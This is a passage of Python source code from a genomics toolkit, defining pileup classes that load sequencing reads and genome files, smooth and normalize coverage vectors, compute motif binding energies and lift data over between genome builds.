Smooth chromosome vectors with a gaussian kernel of width <gaussian_kernel_bandwidth>
:param gaussian_kernel_bandwidth:
:return:
"""
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = scipy.ndimage.gaussian_filter1d(
self.spileups[chrom][strand].astype(float),
sigma=gaussian_kernel_bandwidth)
def toType(self, pileup_dtype=PILEUP_DTYPE):
"""
Converts all pileup chromosome vectors to the specified data type
:param pileup_dtype:
:return:
"""
self.pileup_dtype = pileup_dtype
for chrom in self.spileups:
for strand in self.spileups[chrom]:
self.spileups[chrom][strand] = self.spileups[chrom][strand].astype(pileup_dtype)
def astype(self, pileup_dtype=PILEUP_DTYPE):
"""
Analogous to the numpy.astype() method, returns a new stranded pileup
with chromosome data in the specified data type.
:param pileup_dtype:
:return:
"""
new_pileup = self.emptyCopy()
new_pileup.pileup_dtype = pileup_dtype
for chrom in self.spileups:
new_pileup.spileups[chrom] = {}
for strand in self.spileups[chrom]:
new_pileup.spileups[chrom][strand] = self.spileups[chrom][strand].astype(pileup_dtype)
return new_pileup
def memMap(self, writable=True, tmp_dir=NETWORK_TMP_DIR):
"""
Converts pileup chromosome vectors to mem_mapped arrays on disk.
"""
self.save_path = os.path.join(tmp_dir, 'pileup_{}'.format(self.id))
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
max_chroms_to_map = min(len(self.spileups), MAX_FILEHANDLES_PER_PILEUP)
for chrom in sorted(self.spileups, key=lambda x: len(list(self.spileups[x].values())[0]), reverse=True)[
:max_chroms_to_map]:
for strand in self.spileups[chrom]:
vector_fname = os.path.join(self.save_path, '{}_{}.npy'.format(chrom, strand))
numpy.save(vector_fname, self.spileups[chrom][strand])
self.spileups[chrom][strand] = numpy.load(vector_fname, mmap_mode=('r', 'r+')[writable])
def oneStrand(self, strand):
"""
Returns a Pileups object comprised of only the positive (for <strand> = 1) or negative (for <strand> = -1) strands
"""
# start_time = datetime.datetime.now()
new_pileups = Pileups(chrom_lengths=self.chrom_lengths, name=self.name, build=self.build,
chromosome_dialect=self.chromosome_dialect)
new_pileups.input_filename = self.input_filename
# new_pileups.max_height = self.max_height
new_pileups.coverage = self.coverage
new_pileups.total_reads = self.total_reads
# new_pileups.genome_size = self.genome_size
new_pileups.is_normalized = False
new_pileups.total_read_length = self.total_read_length
new_pileups.mean_read_length = self.mean_read_length
new_pileups.mode_read_length = self.mode_read_length
new_pileups.pileup_dtype = self.pileup_dtype
new_pileups.fragment_size = self.fragment_size
new_pileups.pileups = {}
for chrom in self.spileups:
new_pileups.pileups[chrom] = self.spileups[chrom][strand]
# print 'Done in {}'.format(datetime.datetime.now() - start_time)
return new_pileups
class Pileups(object):
"""
Container for a dictionary of chromosome-length vectors, each containing the number of reads covering that location.
Includes methods for loading from various aligned-read file formats, and for normalizing to coverage
"""
def __init__(self, chrom_lengths={}, input_filename='', name='', build='', strand_shift=0,
pileup_dtype=PILEUP_DTYPE,
chromosome_dialect=DEFAULT_CHROMOSOME_DIALECT):
self.id = toolbox.random_identifier(32)
self.pileup_dtype = pileup_dtype
self.save_path = None
self.chromosome_dialect = chromosome_dialect
self.chrom_lengths = {}
for chrom in chrom_lengths:
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.chrom_lengths[translated_chrom] = chrom_lengths[chrom]
self.is_normalized = False
self.name = name.replace(',', '_')
self.build = build
self.pileups = {}
self.read_counts = {}
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.mean_read_length = 0
self.mode_read_length = 0
# self.max_height = -1
print(('Initialized new pileup object: {}, genome build: {}, chromosome dialect: {}'.format(self.name,
self.build,
self.chromosome_dialect)))
if input_filename:
self.loadFromBed(input_filename, strand_shift=strand_shift)
def __del__(self):
if self.save_path and os.path.exists(self.save_path):
try:
shutil.rmtree(self.save_path)
except (OSError, IOError) as ex:
print('Tried to delete {} but caught {} instead'.format(self.save_path, ex))
@property
def genome_size(self):
return sum(self.chrom_lengths.values())
def save(self, folder_path, gzipped=True):
print('Saving pileup data to {} ...'.format(folder_path))
toolbox.establish_path(folder_path)
for chrom in toolbox.numerical_string_sort(self.chrom_lengths):
print('\tSaving chromosome {}'.format(chrom))
if gzipped:
with gzip.open(os.path.join(folder_path, '{}.npy.gz'.format(chrom)), 'wb') as chrom_file:
numpy.save(chrom_file, self.pileups[chrom])
else:
numpy.save(os.path.join(folder_path, '{}.npy'.format(chrom)), self.pileups[chrom])
with open(os.path.join(folder_path, 'meta_data.txt'), 'w') as out_file:
META_DATA_VARS = (self.name, self.build, self.chromosome_dialect, self.is_normalized, self.mode_read_length)
out_file.write(','.join(str(v) for v in META_DATA_VARS))
@classmethod
def load(cls, folder_path, mmap_mode=''):
"""
Returns a Pileup object loaded from :param:`folder_path`
"""
loaded_pileup = cls()
overall_load_start_time = datetime.datetime.now()
print('Loading pileup data from {} ...'.format(folder_path))
if mmap_mode:
print('Loading up to {} chromosomes in mem-mapped mode {}'.format(MAX_FILEHANDLES_PER_PILEUP, mmap_mode))
with open(os.path.join(folder_path, 'meta_data.txt'), 'rt') as meta_data_file:
meta_data = meta_data_file.read().strip().split(',')
loaded_pileup.name = str(meta_data[0])
loaded_pileup.build = str(meta_data[1])
loaded_pileup.chromosome_dialect = str(meta_data[2])
loaded_pileup.is_normalized = {'True': True, 'False': False}[meta_data[3]]
loaded_pileup.mode_read_length = int(meta_data[4])
mem_mapped_chrom_count = 0
for array_fname in toolbox.numerical_string_sort(os.listdir(folder_path)):
if array_fname.endswith('.npy'):
chrom = toolbox.parse_path(array_fname)[1]
start_time = datetime.datetime.now()
if mmap_mode and mem_mapped_chrom_count < MAX_FILEHANDLES_PER_PILEUP:
print('\tLoading chromosome {} mem-mapped'.format(chrom))
loaded_pileup.pileups[chrom] = numpy.load(os.path.join(folder_path, array_fname), mmap_mode=mmap_mode)
mem_mapped_chrom_count += 1
else:
print('\tLoading chromosome {}'.format(chrom))
loaded_pileup.pileups[chrom] = numpy.load(os.path.join(folder_path, array_fname))
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.pileups[chrom])
# print '\tDone loading in {}'.format(datetime.datetime.now() - start_time)
elif array_fname.endswith('.npy.gz'):
chrom = array_fname.split('.')[0]
start_time = datetime.datetime.now()
print('\tLoading chromosome {}'.format(chrom))
with gzip.open(os.path.join(folder_path, array_fname), 'rb') as chrom_file:
loaded_pileup.pileups[chrom] = numpy.load(chrom_file)
loaded_pileup.chrom_lengths[chrom] = len(loaded_pileup.pileups[chrom])
# print '\tDone loading in {}'.format(datetime.datetime.now() - start_time)
loaded_pileup.pileup_dtype = list(loaded_pileup.pileups.values())[0].dtype
# self.genome_size = sum(loaded_pileup.chrom_lengths.values())
print('Done loading {} from files in {}'.format(loaded_pileup.name, datetime.datetime.now() - overall_load_start_time))
return loaded_pileup
def _initialize(self, pileup_dtype=None, fill_value=None):
if pileup_dtype:
self.pileup_dtype = pileup_dtype
self.pileups = {}
self.read_counts = {}
if fill_value == None:
if self.pileup_dtype == numpy.str:
fill_value = ''
else:
fill_value = 0
for chrom in self.chrom_lengths:
self.pileups[chrom] = numpy.full(self.chrom_lengths[chrom], fill_value=fill_value, dtype=self.pileup_dtype)
self.read_counts[chrom] = 0
self.is_normalized = False
self.total_read_length = 0
self.total_reads = 0
self.coverage = 0
self.mean_read_length = 0
self.mode_read_length = 0
# self.max_height = -1
def loadFromFasta(self, fasta_filename, upper_only=True):
"""
Populates itself with the genome sequence taken from <fasta_filename>. If <upper_only> is set,
convert all nucleotides to upper-case.
:param fasta_filename:
:return:
"""
start_time = datetime.datetime.now()
self.dtype = numpy.character
with open(fasta_filename, 'rt') as fasta_file:
print('Loading genome sequence from {}...'.format(fasta_filename))
self.pileups = {}
for chrom, seq in list(toolbox.parse_fasta_dict(fasta_file.read()).items()):
translated_chrom = toolbox.convert_chroms(chrom, dest=self.chromosome_dialect)
self.pileups[translated_chrom] = numpy.array(list((seq, seq.upper())[upper_only]), dtype=self.dtype)
only_in_fasta = set(self.pileups.keys()).difference(set(self.chrom_lengths.keys()))
print('Done loading genome in {}'.format(datetime.datetime.now() - start_time))
if only_in_fasta:
print(
'The following chromosomes were present in the FASTA file but not in the length dictionary: {}'.format(
', '.join(list(only_in_fasta))))
only_in_self = set(self.chrom_lengths.keys()).difference(set(self.pileups.keys()))
if only_in_self:
print('The following chromosomes were present in the length dictionarybut not in the FASTA file: {}'.format(
', '.join(list(only_in_self))))
def loadFromBed(self, tagalign_filename, strand_shift=0):
"""
Populate the pileup vector from a BED file (each genomic position will contains a count of the number of BED regions that overlap it)
Will shift + strand reads by - <strand_shift> and - strand reads by <strand_shift>.
If strand_shift is None, compute the strand shift automatically using cross-correlation
"""
start_time = datetime.datetime.now()
self._initialize()
self.input_filename = tagalign_filename
self.read_length_counts = collections.defaultdict(lambda: 0)
missing_chroms = set([])
with open(tagalign_filename, 'rt') as tag_file:
print('Computing pileup vectors from reads in {}.'.format(tagalign_filename))
# print 'Chromosome dialect for BED file specified as: \'{}\''.format(reads_chromosome_dialect)
print('Using strand shift of {}'.format(strand_shift))
for line_num, line in enumerate(tag_file):
if line_num % REPORTING_INTERVAL == 0:
dbg_print('Reading line {}'.format(line_num), 1)
split_line = line.strip().split('\t')
if len(line) > 0:
chrom = toolbox.convert_chroms(split_line[0], dest=self.chromosome_dialect)
# print split_line
if len(split_line) >= 6:
strand = {'+': 1, '-': -1}[split_line[5]]
else:
strand = 0
if chrom in self.pileups:
self.read_counts[chrom] += 1
start_pos = int(split_line[1]) + strand * strand_shift
end_pos = int(split_line[2]) - 1 + strand * strand_shift
read_length = end_pos - start_pos + 1
self.total_read_length += read_length
self.read_length_counts[read_length] += 1
self.pileups[chrom][start_pos:end_pos] += 1
else:
if chrom not in missing_chroms:
dbg_print('Chromosome {} not found in self!'.format(chrom), 1)
missing_chroms.add(chrom)
self.total_reads = sum(self.read_counts.values())
if self.total_reads > 0:
self.mean_read_length = self.total_read_length / float(self.total_reads)
else:
self.mean_read_length = 0
print('Done reading file.')
if missing_chroms:
print(
'\tThe following chromosomes were present in the bed file but not in the length dictionary: {}'.format(
', '.join(sorted(list(missing_chroms)))))
self.mode_read_length = max(list(self.read_length_counts.items()), key=lambda x: x[1])[0]
self.computeCoverage()
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def loadFromWig(self, wig_filename, pileup_dtype=PILEUP_DTYPE):
"""
Populate with the annotated values from a WIG file.
All chromosomes must be in a single file (since the arrays are initialized
at the beginning of this method)
"""
start_time = datetime.datetime.now()
self._initialize(pileup_dtype=numpy.float64)
populated_count = 0
missing_chroms = set([])
with open(wig_filename, 'rt') as wig_file:
print('Populating from WIG file {}'.format(wig_filename))
for line_num, line in enumerate(wig_file):
if line_num % 1e6 == 0:
dbg_print('Reading line {}.'.format(line_num), 1)
if line != '\n':
line = line.strip()
split_line = re.split(WHITESPACE, line)
if line.startswith('track'): # it's a track definition line
# so ignore it for now
pass
# declaration lines
elif line.startswith('fixedStep'):
split_line = line.split(' ')
if len(split_line) > 5 or len(split_line) < 4:
raise Exception(
'Invalid number of fields ({}) on line {}'.format(len(split_line), line_num))
field_split = split_line[1].split('=')
if field_split[0] != 'chrom':
raise Exception('Missing field "chrom" on line {}'.format(line_num))
else:
chrom = toolbox.convert_chroms(field_split[1], dest=self.chromosome_dialect)
field_split = split_line[2].split('=')
if field_split[0] != 'start':
raise Exception('Missing field "start" on line {}'.format(line_num))
else:
region_start = int(field_split[1])
if len(split_line) >= 4:
field_split = split_line[3].split('=')
if field_split[0] != 'step':
raise Exception('Missing field "step" on line {}'.format(line_num))
else:
step = int(field_split[1])
else:
step = 1
if len(split_line) == 5:
field_split = split_line[4].split('=')
if field_split[0] != 'span':
raise Exception('Missing field "span" on line {}'.format(line_num))
else:
span = int(field_split[1])
else:
span = 1
if chrom in self.pileups: # only process if we have this chromosome
region_type = 'fixed'
offset = 0
else:
missing_chroms.add(chrom)
region_type = None
elif line.startswith('variableStep'):
split_line = line.split(' ')
if len(split_line) > 3 or len(split_line) < 2:
raise Exception(
'Invalid number of fields ({}) on line {}'.format(len(split_line), line_num))
field_split = split_line[1].split('=')
if field_split[0] != 'chrom':
raise Exception('Missing field "chrom" on line {}'.format(line_num))
else:
chrom = toolbox.convert_chroms(field_split[1], dest=self.chromosome_dialect)
if len(split_line) == 3:
field_split = split_line[2].split('=')
if field_split[0] != 'span':
raise Exception('Missing field "span" on line {}'.format(line_num))
else:
span = int(field_split[1])
else:
span = 1
if chrom in self.pileups: # only process if we have this chromosome
region_type = 'variable'
else:
missing_chroms.add(chrom)
region_type = None
# data lines
elif region_type == 'fixed':
if len(split_line) != 1:
# print 'split_line:{}'.format(split_line)
raise Exception(
'Invalid number of elements for fixedStep data on line {}. Expected {}, found {}. Line: {}'.format(
line_num, 1, len(split_line), line.strip()))
data_val = float(split_line[0])
start_pos = region_start + offset * step
end_pos = start_pos + span
self.pileups[chrom][start_pos:end_pos] = data_val
populated_count += end_pos - start_pos
offset += 1
elif region_type == 'variable':
if len(split_line) != 2:
raise Exception(
'Invalid number of elements for variableStep data on line {}. Expected {}, found {}. Line: {}'.format(
line_num, 2, len(split_line), line.strip()))
start_pos = int(split_line[0])
end_pos = start_pos + span
data_val = float(split_line[1])
self.pileups[chrom][start_pos:end_pos] = data_val
populated_count += end_pos - start_pos
self.toType(pileup_dtype)
print('Done in {}'.format(datetime.datetime.now() - start_time))
print('{} data values added, {} of genome (assuming no overlaps)'.format(populated_count,
populated_count / float(
self.genome_size)))
if missing_chroms:
print('The following chromosomes in the WIG file were not present in ourself: {}'.format(
', '.join(sorted(list(missing_chroms)))))
def populateFromProbes(self, probe_dict, interpolate=False, chromosome_endpoint_value=0):
"""
Given a dictionary (keyed by chromosome name) that contains sequences of tuples in the form (position, value),
such as might be obtained from a tiled microarray experiment, populate self with a continuous vector of values.
If interpolate is True, positions between probes will be interpolated as a linear transition between probes.
Otherwise, the between-probe positions will take on the value of the nearest probe.
:param probe_value_dict:
:return:
"""
print('Populating from microarray probes. Interpolation: {}'.format(('OFF', 'ON')[bool(interpolate)]))
self._initialize()
for chrom in probe_dict:
print('\tPopulating chromosome {}'.format(chrom))
last_pos = chromosome_endpoint_value
last_value = 0
for probe_pos, probe_value in list(probe_dict[chrom]) + [(self.chrom_lengths[chrom],
chromosome_endpoint_value)]: # add a dummy probe for the end of the chromosome
if probe_pos > self.chrom_lengths[chrom]:
print((probe_pos, self.chrom_lengths[chrom]))
assert probe_pos <= self.chrom_lengths[chrom]
distance = probe_pos - last_pos
if interpolate:
difference = probe_value - last_value
# print 'Last_pos: {}, last_value: {}, probe_pos: {}, probe_value: {}, distance: {}, difference: {}'.format(last_pos, last_value, probe_pos, probe_value, distance, difference)
for offset in range(distance):
self.pileups[chrom][last_pos + offset] = last_value + difference * (offset / float(distance))
# print '\t{} {}'.format(offset, self.pileups[chrom][last_pos + offset])
else:
midpoint = last_pos + int((probe_pos - last_pos) / 2)
# print last_pos, probe_pos, midpoint
self.pileups[chrom][last_pos:midpoint] = last_value
self.pileups[chrom][midpoint:probe_pos] = probe_value
last_pos = probe_pos
last_value = probe_value
def computeCoverage(self):
self.coverage = self.total_read_length / float(self.genome_size)
def computeNucleotideFrequencies(self):
"""
Assumes self contains genomic sequences. Computes the frequency of each nucleotide in the genome and returns
as a dictionary
:return:
"""
return motifs.compute_background_distribution(numpy.concatenate(list(self.pileups.values())), normalize=True)
def normalize(self, new_coverage=1):
"""
Converts integer pileup counts to normalized values (to average coverage of 1)
"""
print('Normalizing {}'.format(self.name))
if not self.is_normalized:
start_time = datetime.datetime.now()
print('Coverage currently {}. Normalizing to mean coverage of 1...'.format(self.coverage))
for chrom in self.pileups:
# new_pileup = numpy.zeros(self.chrom_lengths[chrom], dtype = float)
# new_pileup = self.pileups[chrom] / float(self.coverage)
self.pileups[chrom] *= (new_coverage / float(self.coverage))
# self.pileups[chrom] = new_pileup
self.is_normalized = True
print('Done in {}.'.format(datetime.datetime.now() - start_time))
else:
print('\tAlready normalized. Nothing to do.')
def mean(self, list_of_pileups):
"""
Populates itself with the mean of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the mean of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.mean([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the mean is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def var(self, list_of_pileups):
"""
Populates itself with the variance of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the variance of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.var([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the variance is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def std(self, list_of_pileups):
"""
Populates itself with the variance of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the variance of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.std([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the SD is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
def product(self, list_of_pileups):
"""
Populates itself with the product of all the Pileup objects in <list_of_pileups>
"""
start_time = datetime.datetime.now()
print('Calculating the product of {} pileups'.format(len(list_of_pileups)))
self._initialize()
for pileup in list_of_pileups:
for chrom in self.chrom_lengths:
assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
for chrom in self.chrom_lengths:
if numpy.product([chrom in pileup.pileups for pileup in
list_of_pileups]): # only process chromosomes present in all datasets
self.pileups[chrom] = numpy.product([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
dtype=float)
# the SD is normalized if all the input datasets are normalized
self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
print('Done in {}.'.format(datetime.datetime.now() - start_time))
# def sum(self, list_of_pileups):
# """
# Populates itself with the sum of all the Pileup objects in <list_of_pileups>
# """
# start_time = datetime.datetime.now()
# print('Calculating the sum of {} pileups'.format(len(list_of_pileups)))
# self._initialize()
# for pileup in list_of_pileups:
# for chrom in self.chrom_lengths:
# assert self.chrom_lengths[chrom] == pileup.chrom_lengths[chrom]
# for chrom in self.chrom_lengths:
# if numpy.product([chrom in pileup.pileups for pileup in
# list_of_pileups]): # only process chromosomes present in all datasets
# self.pileups[chrom] = numpy.sum([pileup.pileups[chrom] for pileup in list_of_pileups], axis=0,
# dtype=float)
#the SD is normalized if all the input datasets are normalized
# self.is_normalized = bool(numpy.product([pileup.is_normalized for pileup in list_of_pileups]))
# print('Done in {}.'.format(datetime.datetime.now() - start_time))
def sum(self):
"""
Returns the scalar sum of the contents of all contigs.
"""
return self.flatten().astype(float).sum()
def flatten(self, chrom_list=[], include_sex=True):
"""
Return a flat pileup vector by concatenating the individual chromosome vectors (in lexicographical order by chromosome name)
"""
# start_time = datetime.datetime.now()
if not chrom_list:
chrom_list = list(self.pileups.keys())
if not include_sex:
chrom_list = [chrom for chrom in chrom_list if
not sum([element in chrom for element in ['X', 'Y', 'Z', 'W']])]
# print 'Flattening...'
flat_pileup = numpy.concatenate([self.pileups[chrom] for chrom in toolbox.numerical_string_sort(chrom_list)])
# print 'Done in {}.'.format(datetime.datetime.now() - start_time)
return flat_pileup
def clip(self, min_value=0, max_value=1):
"""
Constrains the pileup vectors to be bewtween :param:`min_value` and :param:`max_value`
by applying the numpy.clip function.
"""
print('Clipping pileup values to be between {} and {}'.format(min_value, max_value))
for chrom in self.pileups:
self.pileups[chrom] = numpy.clip(self.spileups[chrom], a_min=min_value, a_max=max_value)
def smooth(self, gaussian_kernel_bandwidth=45):
"""
Smooth chromosome vectors with a gaussian kernel of width <gaussian_kernel_bandwidth>
:param gaussian_kernel_bandwidth:
:return:
"""
new_pileups = self.emptyCopy()
for chrom in self.pileups:
new_pileups.pileups[chrom] = scipy.ndimage.gaussian_filter1d(self.pileups[chrom].astype(numpy.float64),
sigma=gaussian_kernel_bandwidth)
return new_pileups
def applyKernel(self, kernel):
new_pileups = self.emptyCopy()
for chrom in self.pileups:
new_pileups.pileups[chrom] = toolbox.apply_kernel(self.pileups[chrom].astype(numpy.float64), kernel).astype(
self.pileup_dtype)
return new_pileups
def computeBindingEnergy(self, motif, pileup_dtype=PILEUP_DTYPE):
"""
Assumes that we contain a sequence.
Given a log-odds PWM, compute binding energies for both the sequence and its reverse complement,
then return them as a StrandedPileup
:param motif:
:return:
"""
start_time = datetime.datetime.now()
print(('Generating binding energies for {}'.format(self.name)))
binding_energies = StrandedPileups(name=self.name + '_binding_energy', build=self.build,
chrom_lengths=self.chrom_lengths)
binding_energies.spileups = {}
# chrom, sequence_vector, motif = params
param_list = [(chrom, self.pileups[chrom][:], motif) for chrom in
sorted(list(self.pileups.keys()), key=lambda x: self.chrom_lengths[x], reverse=True)]
if MULTI_PROCESSING_METHOD == 'hybrid' or MULTI_PROCESSING_METHOD == 'antfarm':
# convert parameter list to job dictionary to feed to AntFarm consisting only of chromosomes too large
# to use in Pool
job_dict = collections.OrderedDict()
new_param_list = []
for paramset in param_list:
if MULTI_PROCESSING_METHOD == 'antfarm' or len(paramset[1]) > MAX_MESSAGE_SIZE:
job_dict[paramset[0]] = {'inputs': [paramset[1], paramset[2]], 'num_outputs': 2,
'params': [paramset[0]]}
else:
new_param_list.append(paramset)
param_list = new_param_list
print((
'Spawning up to {} subprocesses (using AntFarm) to compute binding energies for {} chromosomes...'.format(
THREADS, len(
job_dict))))
binding_energy_farm = antfarm.AntFarm(slave_script=toolbox.home_path(
'workspace/expression_modeling/model/pileup_binding_energy_chromslave.py'),
base_path=LOCAL_TMP_DIR,
job_dict=job_dict, max_threads=THREADS, debug=False)
results = binding_energy_farm.execute()
del job_dict
for chrom in results:
binding_energies.spileups[chrom] = {-1: results[chrom][0].astype(self.pileup_dtype),
1: results[chrom][1].astype(self.pileup_dtype)}
if MULTI_PROCESSING_METHOD == 'pool' or MULTI_PROCESSING_METHOD == 'hybrid':
print((
'Spawning up to {} subprocesses (using multiprocessing.Pool) to compute binding energies for {} chromosomes...'.format(
THREADS, len(param_list))))
with contextlib.closing(multiprocessing.Pool(THREADS)) as p:
results = p.imap(binding_energy_chromslave, param_list)
elif MULTI_PROCESSING_METHOD == 'none':
print(('Computing binding energies for {} chromosomes with a single process...'.format(len(self.spileups))))
results = list(map(binding_energy_chromslave, param_list))
if MULTI_PROCESSING_METHOD in ('pool', 'hybrid', 'none'):
for chrom, extended_fragments in results:
binding_energies.spileups[chrom] = {-1: extended_fragments[0], 1: extended_fragments[1]}
print(('Done computing binding energies in {}'.format(datetime.datetime.now() - start_time)))
# binding_energies.toType(pileup_dtype)
return binding_energies
def liftover(self, build_mapper, source_pileup):
"""
Populate itself by lifting over all the pileup values from <source_pileup> to self using
<build_mapper>. The .build attributes must be set in both this object and <source_pileup>.
Loci that cannot be lifted over will be left as NaN
"""
start_time = datetime.datetime.now()
print(('Lifting over {} from {} to {}...'.format(source_pileup.name, source_pileup.build, self.build)))
self._initialize(None)
mutliple_dest_count = 0
lifted_over_count = 0
no_chromosome_counts = {}
no_match_count = 0
for chrom in source_pileup.chrom_lengths:
for source_pos in range(source_pileup.chrom_lengths[chrom]):
candidate_dest_loci = build_mapper.liftover_locus(source_build=source_pileup.build,
dest_build=self.build, source_locus=(
toolbox.convert_chroms(chrom, dest=self.chromosome_dialect),
source_pos))
if candidate_dest_loci:
if len(
candidate_dest_loci) > 1: # if the source maps to more than one destination, take note of it and don't lift over
mutliple_dest_count += 1
else:
dest_locus = (toolbox.convert_chroms(candidate_dest_loci[0][0], dest=self.chromosome_dialect),
candidate_dest_loci[0][1])
if dest_locus[0] in self.chrom_lengths: # only liftover chromosomes existing in the destination
try:
self.pileups[dest_locus[0]][dest_locus[1]] = source_pileup.pileups[chrom][source_pos]
except IndexError as ie:
print(('Destination position invalid. Source locus: {}, destination locus: {}'.format(
(chrom, source_pos), dest_locus)))
else:
lifted_over_count += 1
else:
if chrom not in no_chromosome_counts:
no_chromosome_counts[chrom] = 0
no_chromosome_counts[chrom] += 1
else:
no_match_count += 1
print(('Done in {}.'.format(datetime.datetime.now() - start_time)))
print(('{} total loci lifted over, {} did not (out of {} in the source and {} in the destination).'.format(
lifted_over_count, no_match_count, source_pileup.genome_size, self.genome_size)))
print(
('{} source loci mapped to multiple destinations (and were not lifted over).'.format(mutliple_dest_count)))
print(('{} source loci mapped to a chromosome that is not present in the destination. Specifically:'.format(
sum(no_chromosome_counts.values()))))
print(('{}'.format(', '.join(['{}: {}'.format(k, no_chromosome_counts[k]) for k in no_chromosome_counts]))))
def liftoverWithMappingTable(self, destination_build, destination_chrom_lengths, mapping_table_filename,
pileup_dtype=None):
"""
Use <mapping_table_filename> to liftover the pileup vectors in <self>
and return it as a new pileup object.
:return:
"""
CHROM_FIELD = 0
DESTINATION_FRAG_START = 4
DESTINATION_INSERTION = 5
DESTINATION_FRAG_END = 6
SOURCE_FRAG_START = 8
SOURCE_INSERTION = 9
SOURCE_FRAG_END = 10
if not pileup_dtype:
pileup_dtype = self.pileup_dtype
with open(mapping_table_filename, 'rt') as mapping_table:
print(('Lifting over reads to {} using {}...'.format(destination_build, mapping_table_filename)))
lifted_pileups = Pileups(chrom_lengths=destination_chrom_lengths, name=self.name, build=destination_build,
chromosome_dialect=self.chromosome_dialect, pileup_dtype=pileup_dtype)
lifted_pileups._initialize()
# print lifted_pileups.pileups
table_reader = csv.reader(mapping_table, dialect=csv.excel_tab)
for line_num, line in enumerate(table_reader):
# remember mapping table is 1-based
if line_num % 100000 == 0:
dbg_print('Reading line {}'.format(line_num), 1)
if line[SOURCE_FRAG_START] != line[SOURCE_FRAG_END]:
# print line
chrom = toolbox.convert_chroms(line[CHROM_FIELD], dest=self.chromosome_dialect)
if chrom not in self.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom,
self.build)
print(('Warning: {}'.format(warning_message)))
break
# raise Exception(warning_message)
if chrom not in lifted_pileups.pileups:
warning_message = 'Found chromosome {} in mapping table but no record of it in {}.'.format(
chrom,
destination_build)
print(('Warning: {}'.format(warning_message)))
break
# raise Exception(warning_message)
dest_frag_start = int(line[DESTINATION_FRAG_START]) - 1
dest_frag_end = int(line[DESTINATION_FRAG_END]) + 1
source_frag_start = int(line[SOURCE_FRAG_START]) - 1
source_frag_end = int(line[SOURCE_FRAG_END]) + 1
if line[DESTINATION_INSERTION] == r'\N' and line[SOURCE_INSERTION] == r'\N':
if source_frag_end - source_frag_start != dest_frag_end - dest_frag_start:
raise Exception(
'Source ({} bp) and destination ({} bp) fragments not the same size on line {}'.format(
source_frag_end - source_frag_start, dest_frag_end - dest_frag_start, line_num))
else:
try:
lifted_pileups.pileups[chrom][dest_frag_start:dest_frag_end] = self.pileups[chrom][
source_frag_start:source_frag_end]
except ValueError as ve:
print(('ValueError on on line {}. Source: {} {} {}, destination: {} {} {}'.format(
line_num, source_frag_start, source_frag_end, source_frag_end - source_frag_start,
dest_frag_start, dest_frag_end, dest_frag_end - dest_frag_start)))
print(('chrom: {}'.format(chrom)))
print(('source chromosome size: {}'.format(self.pileups[chrom].shape)))
print(('destination chromosome size: {}'.format(lifted_pileups.pileups[chrom].shape)))
print(line)
raise ve
return lifted_pileups
def liftoverWithChain(self, source_pileups, interval_basepath=INTERVAL_BASEPATH,
chainfile_basepath=CHAINFILE_BASEPATH, score_threshold=None,
query_size_threshold=None, ref_size_threshold=None):
overall_start_time = datetime.datetime.now()
# get intervals
best_intervals = filterchains.get_liftover_intervals(dest_build=self.build,
dest_chrom_lengths=self.chrom_lengths,
source_build=source_pileups.build,
source_chrom_lengths=source_pileups.chrom_lengths,
chainfile_basepath=chainfile_basepath,
interval_basepath=interval_basepath,
score_threshold=score_threshold,
query_size_threshold=query_size_threshold,
ref_size_threshold=ref_size_threshold,
source_chromosome_dialect=source_pileups.chromosome_dialect,
dest_chromosome_dialect=self.chromosome_dialect)
# apply intervals
print('Applying mapping intervals...')
self._initialize()
for query_chrom in best_intervals:
if len(best_intervals[query_chrom]) > 0:
if query_chrom in source_pileups.pileups:
print(('\tLifting over chromsome {} (in source) with {} intervals'.format(query_chrom, len(
best_intervals[query_chrom]))))
start_time = datetime.datetime.now()
for interval_idx, interval in enumerate(best_intervals[query_chrom]):
# if interval_idx % REPORTING_INTERVAL == 0:
# _print(
# 'Processing interval {} of {}'.format(interval_idx + 1,
# len(best_intervals[query_chrom])), 3)
query_start, query_end, ref_chrom, ref_offset, interval_polarity = interval
